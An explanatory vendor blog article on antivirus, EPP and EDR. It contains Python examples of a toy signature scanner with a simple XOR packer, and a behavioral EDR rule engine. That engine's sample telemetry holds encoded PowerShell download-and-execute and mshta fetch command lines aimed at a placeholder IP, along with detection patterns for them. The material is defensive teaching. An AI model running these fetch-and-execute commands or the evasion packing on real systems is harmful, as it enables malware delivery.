Cybersecurity is a complex discipline that requires ever more advanced solutions to deal with modern threats. For an organization trying to mitigate their cybersecurity risks, the situation is further complicated by the range of different solutions available. From traditional antivirus to an assortment of newer three-letter technologies like EPP and EDR, this article helps demystify the main cybersecurity defenses available to your business.
Many vendors try to map their products onto as many of the five NIST Cybersecurity Framework functions, commonly called pillars, as possible: Identify, Protect, Detect, Respond, and Recover. However, interpretations and marketing labels vary from vendor to vendor, with the result that, just as not all antivirus solutions are alike, neither are all EPP and EDR products.
The modern threat landscape
Today’s cyberthreat landscape is far more dynamic than it was just 10 years ago. Stealing data, or infiltrating systems and demanding a ransom to unlock them, is profitable, and more criminals than ever have recognized how lucrative cybercrime can be. Because stolen data has a market value, criminals will pay large sums for stolen information or for exploits that can compromise systems, and attackers chase the largest payouts by seeking out zero-day exploits, for which the financial rewards are huge.
Furthermore, the world is more connected, and the barriers to entry in cybercrime are very low. With those barriers reduced, the modern threat landscape sees hundreds of thousands of new malicious programs emerge daily. Some of this malware is fileless or previously unseen, and signature-based antivirus will not detect it, which leaves defenders unable to respond to threats they cannot see.
The takeaway: an unprecedented number of bad actors are creating malicious software to bypass traditional cybersecurity defenses, and every organization should carefully and frequently evaluate its current protections.
Why antivirus software is no longer enough
Traditional antivirus attempts to protect the endpoint by comparing files against a database of signatures (hashes and byte patterns) of known malware. This used to provide adequate protection; however, attackers adapted. Modern polymorphic malware re-encodes itself on every build so that no signature in the database matches the bytes on disk. In addition, there are many types of malware with delivery approaches that evade traditional antivirus altogether.
Adding heuristic analysis to traditional antivirus has helped somewhat against polymorphic malware. Sometimes marketed as “next-gen antivirus”, heuristic engines statically analyze a file’s code (its structure, imported functions, strings, and any recognizable packer or decoder stub) to identify suspicious characteristics, or dynamically analyze it by running it in a sandbox and observing what it does. A sample is flagged when its characteristics or behavior match those of a repository of known malware. But heuristic scans still compare the suspect code with the properties and behavior of known malware families. Therein lies the fundamental weakness of traditional antivirus: it relies on detecting known and catalogued threats.
Antivirus is therefore largely blind to zero-day malware: previously unseen malicious software that has no catalogued file signature and does not use a method of operation the heuristics already recognize. There is also fileless malware to contend with. It runs in memory and abuses legitimate, already-installed tools such as PowerShell or WMI, so there is no new file on disk for a signature or heuristic scan to examine.
As a standalone solution, therefore, antivirus software is no longer adequate in the modern cyberthreat landscape. Hence the newer approaches, EPP and EDR, which we look at next.
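To make the argument concrete, here is an added example (it is not code from the original article or from any product named on this page): a toy scanner in Python with a hash signature and a byte-pattern signature for one constructed, harmless “malware” sample, plus a static heuristic that recognizes one decoder stub. The sample bytes, signature names and stub formats are all invented for illustration. A lightly edited copy still matches the byte pattern, a packed copy evades both signatures and is caught only because the heuristic knows that particular stub, and a copy packed with a stub the engine has never seen is missed entirely, which is exactly the catalogued-threat weakness described above.

```python
import hashlib
import re
from typing import Optional

# Constructed stand-in for a catalogued malicious script (harmless text, not real malware).
KNOWN_SAMPLE = b"GET http://198.51.100.7/stage2.bin; EXEC stage2.bin; PERSIST run-key"

# Signature database: an exact-hash signature and a byte-pattern signature (names invented).
HASH_SIGNATURES = {hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Trojan.Downloader.Sample"}
PATTERN_SIGNATURES = [(re.compile(rb"GET http://[^;]+; EXEC"), "Trojan.Downloader.Generic")]

# The one decoder-stub format the heuristic engine has been taught (constructed format).
XOR_STUB = b"STUB:XOR:"


def signature_scan(blob: bytes) -> Optional[str]:
    """Traditional AV: look up the file hash, then search for known byte patterns."""
    hit = HASH_SIGNATURES.get(hashlib.sha256(blob).hexdigest())
    if hit:
        return hit
    for pattern, name in PATTERN_SIGNATURES:
        if pattern.search(blob):
            return name
    return None


def xor_pack(payload: bytes, key: int) -> bytes:
    """Simulated polymorphic packer: XOR the payload with a per-build key and
    prepend a decoder stub. Every build has a new hash, and the catalogued byte
    pattern no longer appears in the bytes on disk."""
    return XOR_STUB + b"%02x:" % key + bytes(b ^ key for b in payload)


def add_pack(payload: bytes, key: int) -> bytes:
    """A second, 'never seen before' packer: byte-wise addition mod 256 behind a
    different stub format. The heuristic below knows nothing about it."""
    return b"STUB:ADD:" + b"%02x:" % key + bytes((b + key) % 256 for b in payload)


def heuristic_scan(blob: bytes) -> Optional[str]:
    """'Next-gen' heuristic: recognise a known decoder stub, emulate it to recover
    the real payload, and rescan the result. Its limit is the same as the
    signature engine's: it only recognises stubs it has been taught."""
    if blob.startswith(XOR_STUB):
        key = int(blob[len(XOR_STUB):len(XOR_STUB) + 2], 16)
        unpacked = bytes(b ^ key for b in blob[len(XOR_STUB) + 3:])
        hit = signature_scan(unpacked)
        if hit:
            return "Heuristic.Packed(" + hit + ")"
    return None


def scan(blob: bytes) -> Optional[str]:
    """Full scan: signatures first, heuristics second; None means 'clean'."""
    return signature_scan(blob) or heuristic_scan(blob)


if __name__ == "__main__":
    print("original sample:", scan(KNOWN_SAMPLE))                  # hash signature hits
    print("edited copy:    ", scan(KNOWN_SAMPLE + b" #v2"))        # hash misses, byte pattern hits
    print("xor-packed:     ", scan(xor_pack(KNOWN_SAMPLE, 0x5A)))  # only the heuristic hits
    print("add-packed:     ", scan(add_pack(KNOWN_SAMPLE, 7)))     # nothing hits: a 'zero-day'
```

The last case is the important one: the add-packed copy carries the same payload and does the same thing at run time, but because neither a signature nor a stub emulator has been written for it, a purely static, catalogue-driven scanner reports it clean. Only watching what it does after it runs (the behavioral approach discussed under EDR below) would catch it.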
EPP: What is an endpoint protection platform?
EPP brings expanded capabilities to standard antivirus technology. You can think of EPP as augmented antivirus that recognizes more suspicious behaviors in real time and can identify some kinds of compromised devices across the network. EPPs focus on preventing the initial infection (the Protect pillar, the second of the five) but, on their own, do not cover detection and response.
EPPs provide a suite of tools for defending networked devices, such as workstations, laptops, and servers, against security threats. An EPP includes technologies like antivirus signature scanning, data encryption, personal firewalls with port/device control, and intrusion prevention.
A weakness of most EPP solutions is their inherently preventive scope. They are limited in responding to threats that evade frontline defenses and get into your environment. An EPP is much better than standard antivirus at blocking malware, but malware and attack tools are evolving faster than EPP prevention capabilities.
EDR: What is endpoint detection and response?
EDR builds a far more comprehensive defense than antivirus or EPP can mount by continuously recording endpoint telemetry (process creation, file and registry changes, network connections, logons) and applying behavioral detection logic to it, increasingly with help from machine learning. Aligned with the Detect and Respond pillars, EDR focuses on continuous real-time monitoring of endpoints and on countering suspicious activity. Because it keys on what a process does rather than on a known file signature, it can catch a zero-day or fileless threat by its behavior, for example an Office application launching a script interpreter with a hidden window, and respond to it quickly.
Another key feature is centralized management of all network endpoints and their security capabilities from a single console, which provides better visibility and oversight. This holistic view of endpoint security lets different security technologies exchange information about events and report to the security team, which improves the organization’s overall security posture.
Some of the key distinguishing features of EDR solutions include:
- Full visibility into endpoint activity – By collecting and analyzing data from endpoints in real time and gathering the information in a central console, IT teams get full visibility into endpoint activity from a single interface.
- Proactive security – EDR is proactive because it enables IT teams to hunt for threats based on subtle behavioral analytics rather than by comparing potential threats with databases of known file signatures or code snippets.
- Automated threat response – EDR platforms let IT teams define remediation actions (such as killing a process, quarantining a file, or isolating a host from the network) that run automatically when predefined rules match.
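As an added example of the behavioral, rule-based approach described above (it is not the code of any EDR product named on this page), the Python below evaluates a few constructed process-creation events of the kind an EDR sensor reports, groups the detections into a central console view, and picks an automated response from a policy. The rules, severities, response actions, hostnames, PIDs and command lines are all assumptions made for illustration. Note that none of the rules needs a file hash: the malicious event is detected from the parent process and the command line alone, which is what lets this approach see fileless activity that a signature scan cannot.

```python
import base64
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record as an EDR sensor would report it (constructed schema)."""
    host: str
    pid: int
    image: str          # executable name, lower-case
    parent_image: str   # name of the parent process
    cmdline: str


@dataclass(frozen=True)
class Detection:
    host: str
    pid: int
    rules: Tuple[str, ...]
    severity: int       # 1 = low, 2 = medium, 3 = high
    action: str         # automated response chosen by policy


OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts these abbreviations of -EncodedCommand; "-Encoding" is NOT one
# of them and is a classic false positive of naive substring matching.
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}


def effective_script(e: ProcessEvent) -> str:
    """Return the command text, decoding -EncodedCommand (Base64 of UTF-16LE) if present."""
    tokens = e.cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le", errors="replace")
            except ValueError:        # malformed Base64: fall back to the raw command line
                return e.cmdline
    return e.cmdline


# Behavioral rules: each looks at what the process is doing, never at a file hash.
def office_app_spawns_script_host(e: ProcessEvent) -> bool:
    return e.parent_image in OFFICE_APPS and e.image in SCRIPT_HOSTS


def powershell_encoded_command(e: ProcessEvent) -> bool:
    return e.image == "powershell.exe" and any(t.lower() in ENCODED_FLAGS for t in e.cmdline.split())


def powershell_download_and_execute(e: ProcessEvent) -> bool:
    if e.image != "powershell.exe":
        return False
    s = effective_script(e).lower()
    fetches = any(k in s for k in ("downloadstring", "downloadfile", "invoke-webrequest"))
    runs = any(k in s for k in ("iex", "invoke-expression"))
    return fetches and runs


RULES: List[Tuple[str, int, Callable[[ProcessEvent], bool]]] = [
    ("office_app_spawns_script_host", 3, office_app_spawns_script_host),
    ("powershell_encoded_command", 2, powershell_encoded_command),
    ("powershell_download_and_execute", 2, powershell_download_and_execute),
]
# Rule-based automated response keyed on the highest severity hit (assumed policy).
RESPONSE_POLICY = {3: "kill_process_tree;isolate_host", 2: "kill_process;collect_triage_package", 1: "alert_only"}


def evaluate(e: ProcessEvent) -> Optional[Detection]:
    hits = [(name, sev) for name, sev, rule in RULES if rule(e)]
    if not hits:
        return None
    severity = max(sev for _, sev in hits)
    return Detection(e.host, e.pid, tuple(name for name, _ in hits), severity, RESPONSE_POLICY[severity])


def triage(events: List[ProcessEvent]) -> Dict[str, List[Detection]]:
    """Central console view: detections from every endpoint, grouped by host."""
    console: Dict[str, List[Detection]] = {}
    for e in events:
        d = evaluate(e)
        if d:
            console.setdefault(e.host, []).append(d)
    return console


# Constructed telemetry (hostnames, PIDs, and command lines are invented).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent("ws-101", 4120, "winword.exe", "explorer.exe", "WINWORD.EXE /n invoice.docm"),
    ProcessEvent("ws-101", 4188, "powershell.exe", "winword.exe", "powershell.exe -w hidden -nop -enc " + ENCODED),
    ProcessEvent("srv-02", 913, "powershell.exe", "explorer.exe", "powershell.exe -File C:\\scripts\\backup.ps1 -Encoding utf8"),
    ProcessEvent("ws-107", 2201, "mshta.exe", "outlook.exe", "mshta.exe http://198.51.100.7/p.hta"),
]

if __name__ == "__main__":
    for host, detections in triage(SAMPLE_EVENTS).items():
        for d in detections:
            print(host, d.pid, "sev", d.severity, d.action, "|", ", ".join(d.rules))
```

Two design points worth noticing. First, the encoded PowerShell rule matches only the real abbreviations of -EncodedCommand, so the legitimate backup script on srv-02 that passes -Encoding utf8 is not flagged; rules that grep for "-enc" as a bare substring generate exactly that kind of noise. Second, the third rule decodes the Base64 before inspecting it, so the same download-and-execute logic applies whether the attacker obfuscated the command line or not.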
What is the difference between EPP and EDR?
Traditionally, EPP (endpoint protection platform) and EDR (endpoint detection and response) were two separate security solutions that together covered three of the five NIST Cybersecurity Framework pillars: Protect, Detect, and Respond. Today, vendors are merging EPP and EDR functions into one product, but unfortunately the labels can be confusing.
For example, Microsoft’s combined EPP+EDR is called Microsoft Defender for Endpoint. SentinelOne now offers its Endpoint Security Platform. Cylance’s flagship still carries the EPP label, but it also has very good EDR functionality. Carbon Black uses the EDR label, but its offering includes “next-generation antivirus” protection.
All of the above are amalgamations of EPP and EDR functionality. Labels aside, today’s EPP/EDR products are far more capable than traditional antivirus (or even last year’s EPP). A complete endpoint protection solution includes the capabilities of antivirus, EPP, and EDR, and together they protect your endpoints, detect anomalies that slip through your defenses, and give you the information you need to investigate and respond.
Standard antivirus software on its own should be considered inadequate in today’s threat environment. EPP and EDR are now overlapping terms, and the tools are merging into holistic endpoint security solutions. Increasingly, detection and response capabilities are integrated into endpoint protection systems. Advanced EPP/EDR solutions detect known and unknown malware, provide real-time automated response capabilities, and add visibility into the causes and impact of cyber attacks.
Need a partner to help you navigate today’s cybersecurity landscape? Umbrella Managed Systems can help you with modern cybersecurity challenges. To find out more, contact us today for a free consultation.